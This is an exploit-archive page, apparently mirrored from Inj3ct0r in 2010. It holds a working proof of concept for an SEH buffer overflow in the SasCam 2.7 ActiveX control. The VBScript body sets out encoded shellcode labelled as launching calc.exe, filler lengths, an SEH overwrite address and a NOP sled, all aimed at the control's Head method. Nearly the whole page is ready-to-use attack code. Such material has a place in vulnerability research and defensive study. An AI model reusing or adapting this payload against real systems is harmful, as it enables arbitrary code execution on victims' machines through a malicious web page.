Home / os / win7

SasCam 2.7 ActiveX Head Buffer Overflow

Posted on 05 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SasCam 2.7 ActiveX Head Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
SasCam 2.7 ActiveX Head Buffer Overflow
=======================================


# Exploit Title: SasCam 2.7 ActiveX Head Buffer Overflow
# Author: Blake
# Software Link:
http://download.cnet.com/SasCam-Webcam-Server/3000-2348_4-10491197.html
# Version: 2.7
# Tested on: Windows XP SP3 / IE6 and 7
 
&lt;html&gt;
&lt;object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3'
id='target'&gt;&lt;/object&gt;
&lt;script language='vbscript'&gt;
 
'for debugging/custom prolog
'targetFile = &quot;C:Program FilesSasCam_freeXHTTP.dll&quot;
'prototype  = &quot;Sub Head ( ByVal sURL As String )&quot;
'memberName = &quot;Head&quot;
'progid     = &quot;XHTTP.HTTP&quot;
'argCount   = 1
 
'EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2
sc = unescape(&quot;%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49&quot;) &amp; _
 
unescape(&quot;%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68&quot;) &amp; _
 
unescape(&quot;%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42&quot;) &amp; _
 
unescape(&quot;%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a&quot;) &amp; _
 
unescape(&quot;%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c&quot;) &amp; _
 
unescape(&quot;%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45&quot;) &amp; _
 
unescape(&quot;%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70&quot;) &amp; _
 
unescape(&quot;%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c&quot;) &amp; _
 
unescape(&quot;%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f&quot;) &amp; _
 
unescape(&quot;%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d&quot;) &amp; _
 
unescape(&quot;%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46&quot;) &amp; _
 
unescape(&quot;%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77&quot;) &amp; _
 
unescape(&quot;%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a&quot;) &amp; _
 
unescape(&quot;%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f&quot;) &amp; _
 
unescape(&quot;%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35&quot;) &amp; _
 
unescape(&quot;%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d&quot;) &amp; _
 
unescape(&quot;%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71&quot;) &amp; _
 
unescape(&quot;%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f&quot;) &amp; _
 
unescape(&quot;%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52&quot;) &amp; _
 
unescape(&quot;%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61&quot;) &amp; _
 
unescape(&quot;%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35&quot;) &amp; _
                        unescape(&quot;%50%68&quot;)
 
buffer = String(8349, &quot;A&quot;)
next_seh = unescape(&quot;%eb%06%90%90&quot;)
seh = unescape(&quot;%56%29%d1%72&quot;)                ' 0x72D12956 [msacm32.drv]
nops = String(20, unescape(&quot;%90&quot;))                  ' nop sled
junk = String(4151, &quot;B&quot;)
 
exploit = buffer + next_seh + seh + nops + sc + junk
target.Head exploit
 
&lt;/script&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :